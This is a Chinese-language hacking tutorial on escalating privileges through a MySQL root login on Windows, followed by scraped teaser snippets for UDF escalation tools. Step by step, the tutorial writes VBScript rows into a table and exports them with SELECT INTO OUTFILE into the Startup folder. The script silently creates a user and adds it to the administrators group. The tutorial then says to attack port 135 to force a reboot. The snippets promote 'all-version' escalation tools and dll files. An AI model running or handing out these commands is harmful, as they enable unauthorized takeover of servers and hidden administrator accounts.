(也可适用于WEBSHELL提权,此方法已被改进,不会弹黑CMD窗口.过段时间放出!)
1、连接到mysql 服务器
mysql -u root -h 192.168.0.1
mysql.exe 这个程序在你安装了mysql的的bin目录中
2、让我们来看看服务器中有些什么数据库
mysql>show databases;
mysql默认安装时会有mysql、test这两个数据库,如果你看到有其它的数据库那么就是用户自建的数据库。
3、让我们进入数据库
mysql>use test;
我们将会进入test数据库中
4、查看我们进入数据库中有些什么数据表
mysql>show tables;
默认的情况下,test中没有任何表的存在。
以下为关键的部分
5、在test数据库下创建一个新的表;
mysql>create table a (cmd text);
好了,我们创建了一个新的表,表名为a,表中只存放一个字段,字段名为cmd,为text文本。
6、在表中插入内容
mysql>insert into a values ("set wshshell=createobject (""wscript.shell"" ) " );
mysql>insert into a values ("a=wshshell.run (""cmd.exe /c net user 1 1/add"",0) " );
mysql>insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators 1 /add"",0) " );
注意双引号和括号以及后面的"0"一定要输入!我们将用这三条命令来建立一个vbs的脚本程序!
7、好了,现在我们来看看表a中有些什么
mysql>select * from a;
我们将会看到表中有三行数据,就是我们刚刚输入的内容,确认你输入的内容无误后,我们来到下一步
8、输出表为一个vbs的脚本文件
mysql>select * from a into outfile "c:\\docume~1\\alluse~1\\「开始」菜单\\程序\\启动\\a.vbs";
我们把我们表中的内容输入到启动组中,是一个vbs的脚本文件!注意"\"符号。
9、看到这大家肯定知道了,就是利用mysql输出一个可执行的文件而已。为什么不用bat呢,因为启动运行时会有明显的dos窗口出来,而用vbs脚本则可以完全隐藏窗口且不会有错误提示!本来,应该还有一句完成脚本后自动删除此脚本的,但是中文目录实在无法处理,只有作罢!好了,找个工具攻击135让服务器重启吧,几分钟以后你就是管理员了。
相关推荐
在网络安全领域,"mysql提权udf"常常指的是利用UDF进行权限提升的技巧,这对于渗透测试和系统安全评估至关重要。 MySQL提权通常涉及以下步骤: 1. **UDF编译与注入**:首先,你需要编写或找到一个能够执行系统命令...
先前我发布了一个用于MYSQL提权的UDF,不过好像不少朋友不是很明白它的使用,不断有人问我它的使用方法,有人干脆叫我写个此UDF的专用PHP。说实话在我写这个PHP之前就只学过点ASP,对PHP那是一窍不通,所以程序中...
mysql自动提权工具,。。。。。。。。。。。。。。。。。。。。。。。
本文将详细阐述 MySQL 提权的四种常见方法:UDF 提权、VBS 提权、WebShell 提权以及 Linux 下的 MySQL Backdoor 提权。 #### 一、UDF 提权 **UDF(User Defined Function)提权** 是指通过创建自定义函数来执行...
MySQL提权UDF.dll是关于数据库安全领域的一个关键知识点,主要涉及到MySQL服务器的权限提升漏洞利用。UDF(User Defined Function)是MySQL提供的一种机制,允许用户自定义函数以扩展其功能。然而,不当的UDF管理或...
mysql提权,udf提权所需要的dll文件,有64位和32位
最近,网络上有技术博主“残剑”发布了一篇名为《星外下的mysql提权1》的文章,揭示了一个针对MySQL数据库的提权方法,向网络安全界展示了一种潜在的风险。 首先,作者“残剑”通过对一个WordPress网站的渗透测试,...
必备神器->MYSQL高版本提权工具-V 2011
Mysql权限提取实例教程, 利用mysql提权的前提就是,服务器安装了mysql,mysql的服务没有降权,(降权也可以提,没降权的话就最好了),是默认安装以系统权限继承的(system权限). 并且获得了root的账号密码
近期,随着“暗月mysql全版本通杀提权”的曝光,数据库管理员和网络安全专家们再次聚焦于这一关键安全议题。 MySQL因其强大的功能和高效率被众多网站和应用程序采用。它提供了一个丰富而复杂的权限系统,旨在保护...
“暗月mysql全版本通杀提权神器”是一个专为MySQL设计的安全测试工具,旨在帮助用户发现和利用可能存在的提权漏洞。它支持多种MySQL版本,无论你是使用旧版还是最新版的MySQL,都可以通过这个工具进行安全检测。 ...
提权用的 udf 得到root帐号可以用这个提权
暗月mysql全版本通杀提权神器-V2014,亲测真实有效,可用。如有侵权,请联系CSDN管理员删除即可
本篇将详细介绍如何利用UDF库来实现MySQL的提权操作。 首先,提权通常涉及到获取更高的系统权限,而在MySQL中,通过UDF库可以执行系统级别的命令,从而可能达到提升权限的目的。要实现这一过程,我们需要满足以下...
mysql udf提权文件mysql udf提权文件
- **MySQL提权**:利用MySQL的自定义函数或`UDF`(User Defined Function)等手段进行提权。 - **SQL Server提权**:通过调用`xp_cmdshell`存储过程来实现权限提升。 3. **第三方软件和服务提权**:利用非系统...
描述中的“有两个版本”可能指的是为不同MySQL版本设计的两种UDF提权工具。 在进行UDF提权时,安全专家通常会遵循以下步骤: 1. 分析目标MySQL版本的特性和已知漏洞。 2. 设计或寻找适合的UDF库,该库能够执行提权...
mysql 注入提权命令 mysql 注入提权命令是指通过利用 mysql 中的漏洞来获取服务器的权限,从而控制服务器的行为。本文主要讲述了 mysql 注入高级暴库用户密码的方法,涉及到 mysql 中的 SCHEMATA 库。 知识点一:...
在IT领域,尤其是在数据库管理与安全方面,“mysql用户root提权”是一个重要的议题,涉及到数据库权限管理和潜在的安全风险。从给定的文件标题、描述、标签以及部分内容来看,本话题聚焦于MySQL数据库环境下如何对...